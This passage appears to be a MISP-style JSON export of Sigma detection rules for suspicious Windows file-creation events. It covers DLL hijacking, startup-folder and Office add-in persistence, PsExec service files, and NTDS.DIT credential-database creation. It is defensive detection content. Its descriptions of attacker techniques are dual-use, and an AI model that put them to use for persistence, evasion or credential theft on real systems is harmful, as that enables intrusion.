(See reference section for more details)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-28", "falsepositive": [ "Unknown" ], "filename": "file_event_win_anydesk_writing_susp_binaries.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d367498-5112-4ae5-a06a-96e7bc33a211", "value": "Suspicious Binary Writes Via AnyDesk" }, { "description": "Detects the creation of binaries in the WinSxS folder by non-system processes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-11", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_winsxs_binary_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winsxs_binary_creation.yml" ], "tags": [ "attack.execution" ] }, "uuid": "34746e8c-5fb8-415a-b135-0abc167e912a", "value": "WinSxS Executable File Creation By Non-System Process" }, { "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well-known directories (Local, Roaming, LocalLow). 
This technique could be used to bypass detections that exclude the AppData folder for fear of false positives", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", "value": "Suspicious File Creation In Uncommon AppData Folder" }, { "description": "Detects when an attacker creates a folder structure similar to Windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick the DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-30", "falsepositive": [ "Unknown" ], "filename": "file_event_win_dll_sideloading_space_path.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1552932770464292864", "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6f91281-20aa-446a-b986-38a92813a18f", "value": "DLL Search Order Hijackig Via Additional Space in Path" }, { "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", "meta": { "author": "@ROxPinTeddy", "creation_date": "2020-05-12", "falsepositive": [ "Legitimate administrative use" ], "filename": "file_event_win_advanced_ip_scanner.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" ], "tags": [ "attack.discovery", "attack.t1046" ] }, "related": [ { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fed85bf9-e075-4280-9159-fbe8a023d6fa", "value": "Advanced IP Scanner - File Event" }, { "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", "meta": { "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "creation_date": "2021-10-25", "falsepositive": [ "Legitimate downloads of \".vhd\" files would also trigger this" ], "filename": "file_event_win_vhd_download_via_browsers.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://redcanary.com/blog/intelligence-insights-october-2021/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml" ], "tags": [ "attack.resource-development", "attack.t1587.001" ] }, "related": [ { "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", "value": "VHD Image Download Via Browser" }, { "description": "Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "In rare occasions administrators might leverage LiveKD to perform live kernel debugging. This should not be allowed on production systems. Investigate and apply additional filters where necessary." ], "filename": "file_event_win_sysinternals_livekd_default_dump_name.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "814ddeca-3d31-4265-8e07-8cc54fb44903", "value": "LiveKD Kernel Memory Dump File Created" }, { "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", "meta": { "author": "frack113", "creation_date": "2021-12-29", "falsepositive": [ "Unknown" ], "filename": "file_event_win_creation_scr_binary_file.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" ], "tags": [ "attack.persistence", "attack.t1546.002" ] }, "related": [ { "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", "value": "Suspicious Screensaver Binary File Creation" }, { "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", "meta": { "author": "frack113", "creation_date": "2022-06-08", "falsepositive": [ "Legitimate microsoft diagcab" ], "filename": "file_event_win_susp_diagcab.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://threadreaderapp.com/thread/1533879688141086720.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml" ], "tags": [ "attack.resource-development" ] }, "uuid": "3d0ed417-3d94-4963-a562-4a92c940656a", "value": "Creation of a Diagcab" }, { "description": "Detects creation of files which are the results of executing the built-in reconnaissance script \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Unknown" ], "filename": "file_event_win_lolbin_gather_network_info_script_output.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "f92a6f1e-a512-4a15-9735-da09e78d7273", "value": "GatherNetworkInfo.VBS Reconnaissance Script Output" }, { "description": "Detects default RemCom service filename which indicates RemCom service installation and execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-04", "falsepositive": [ "Unknown" ], "filename": "file_event_win_remcom_service.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/kavika13/RemCom/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remcom_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7eff1a7f-dd45-4c20-877a-f21e342a7611", "value": "RemCom Service File Creation" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate use" ], "filename": "file_event_win_anydesk_artefact.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", "value": "Anydesk Temporary Artefact" }, { "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", "meta": { "author": "frack113", "creation_date": "2022-01-21", "falsepositive": [ "Unknown" ], "filename": "file_event_win_susp_colorcpl.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/eral4m/status/1480468728324231172?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564" ] }, "related": [ { "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "value": "Suspicious Creation with Colorcpl" }, { "description": "Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-06-27", "falsepositive": [ 
"Unlikely" ], "filename": "file_event_win_hktl_krbrelay_remote_ioc.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_krbrelay_remote_ioc.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ab79e90-9fab-4cdf-a7b2-6522bc742adb", "value": "HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators" }, { "description": "Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Some false positives may occur with legitimate renamed process monitor binaries" ], "filename": "file_event_win_sysinternals_procmon_driver_susp_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a05baa88-e922-4001-bc4d-8738135f27de", "value": "Process Monitor Driver Creation By Non-Sysinternals Binary" }, { "description": "Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.", "meta": 
{ "author": "Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-02", "falsepositive": [ "Loading a user environment from a backup or a domain controller", "Synchronization of templates" ], "filename": "file_event_win_office_startup_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders", "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_startup_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1137" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", "value": "Potential Persistence Via Microsoft Office Startup Folder" }, { "description": "Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.\nHack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Some false positives may occur with legitimate renamed process explorer binaries" ], "filename": "file_event_win_sysinternals_procexp_driver_susp_creation.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer", "https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/", "https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks", 
"https://github.com/Yaxser/Backstab", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procexp_driver_susp_creation.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1068" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "de46c52b-0bf8-4936-a327-aace94f94ac6", "value": "Process Explorer Driver Creation By Non-Sysinternals Binary" }, { "description": "Detects WerFault.exe copied to a suspicious folder, which could be a sign of WerFault DLL hijacking", "meta": { "author": "frack113", "creation_date": "2022-05-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_werfault_dll_hijacking.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1574.001" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "value": "Creation of an WerFault.exe in Unusual Folder" }, { "description": "Detects file writes of WMI script event consumer", "meta": { "author": "Thomas Patzke", "creation_date": "2018-03-07", "falsepositive": [ "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" ], "tags": [ "attack.t1546.003", "attack.persistence" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "value": "WMI Persistence - Script Event Consumer File Write" }, { "description": "Detects when a file with a suspicious extension is created in the startup folder", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-10", "falsepositive": [ "Rare legitimate usage of some of the extensions mentioned in the rule" ], "filename": "file_event_win_susp_startup_folder_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/last-byte/PersistenceSniper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_startup_folder_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28208707-fe31-437f-9a7f-4b1108b94d2e", "value": "Suspicious Startup Folder Persistence" }, { "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "FP could be caused by legitimate application writing shortcuts for example. 
This folder should always be inspected to make sure that all the files in there are legitimate" ], "filename": "file_event_win_startup_folder_file_write.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/12", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", "value": "Startup Folder File Write" }, { "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", "meta": { "author": "Thomas Patzke", "creation_date": "2017-06-12", "falsepositive": [ "Unknown" ], "filename": "file_event_win_sysinternals_psexec_service.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", "value": "PsExec Service File Creation" }, { "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts 
(.wll/.xll are simply .dll fit for Word or Excel).", "meta": { "author": "NVISO", "creation_date": "2020-05-11", "falsepositive": [ "Legitimate add-ins" ], "filename": "file_event_win_office_addin_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md", "https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1137.006" ] }, "related": [ { "dest-uuid": "34f1d81d-fe88-4f97-bd3b-a3164536255d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "value": "Potential Persistence Via Microsoft Office Add-In" }, { "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. 
This could be a sign of attackers abusing OneNote attachments", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-22", "falsepositive": [ "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "filename": "file_event_win_office_onenote_files_in_susp_locations.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/", "https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", "value": "OneNote Attachment File Dropped In Suspicious Location" }, { "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", "meta": { "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "creation_date": "2022-11-18", "falsepositive": [ "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "filename": "file_event_win_net_cli_artefact.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", 
"https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "value": "Suspicious DotNET CLR Usage Log Artifact" }, { "description": "Detects creation of a file named \"ntds.dit\" (Active Directory Database)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ntds_dit_creation.yml", "level": "low", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_creation.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b8baa3f-575c-46ee-8715-d6f28cc7d33c", "value": "NTDS.DIT Created" }, { "description": "Detects the creation of the \"PSScriptPolicyTest\" PowerShell script by an uncommon process. 
This file is usually generated by Microsoft Powershell to test against Applocker.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-01", "falsepositive": [ "Unknown" ], "filename": "file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "1027d292-dd87-4a1a-8701-2abe04d7783c", "value": "PSScriptPolicyTest Creation By Uncommon Process" }, { "description": "Detects files dropped by Winnti as described in RedMimicry Winnti playbook", "meta": { "author": "Alexander Rausch", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "file_event_win_redmimicry_winnti_filedrop.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://redmimicry.com/posts/redmimicry-winnti/#dropper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "value": "Potential Winnti Dropper Activity" }, { "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. 
Which could be indicative of a UEFI-based persistence method", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-18", "falsepositive": [ "Legitimate usage of the file by hardware manufacturers such as Lenovo (Thanks @0gtweet for the tip)" ], "filename": "file_event_win_wpbbin_persistence.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/wpbbin.html", "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1542.001" ] }, "related": [ { "dest-uuid": "16ab6452-c3c1-497c-a47d-206018ca1ada", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", "value": "UEFI Persistence Via Wpbbin - FileCreation" }, { "description": "Detects the creation of a file with the \".pdf\" extension by the \"RegEdit.exe\" process.\nThis indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-08", "falsepositive": [ "Unlikely" ], "filename": "file_event_win_regedit_print_as_pdf.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_regedit_print_as_pdf.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "145095eb-e273-443b-83d0-f9b519b7867b", "value": "PDF File Created By RegEdit.EXE" }, { "description": "Detects the 
creation of a new PowerShell module \".psm1\", \".psd1\", \".dll\", \".ps1\", etc. by a non-PowerShell process", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-09", "falsepositive": [ "Unknown" ], "filename": "file_event_win_powershell_module_uncommon_creation.yml", "level": "medium", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_uncommon_creation.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "e3845023-ca9a-4024-b2b2-5422156d5527", "value": "PowerShell Module File Created By Non-PowerShell Process" }, { "description": "Detects processes creating temp files related to PCRE.NET package", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-29", "falsepositive": [ "Unknown" ], "filename": "file_event_win_pcre_net_temp_file.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://twitter.com/rbmaslen/status/1321859647091970051", "https://twitter.com/tifkin_/status/1321916444557365248", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "value": "PCRE.NET Package Temp Files" }, { "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research 
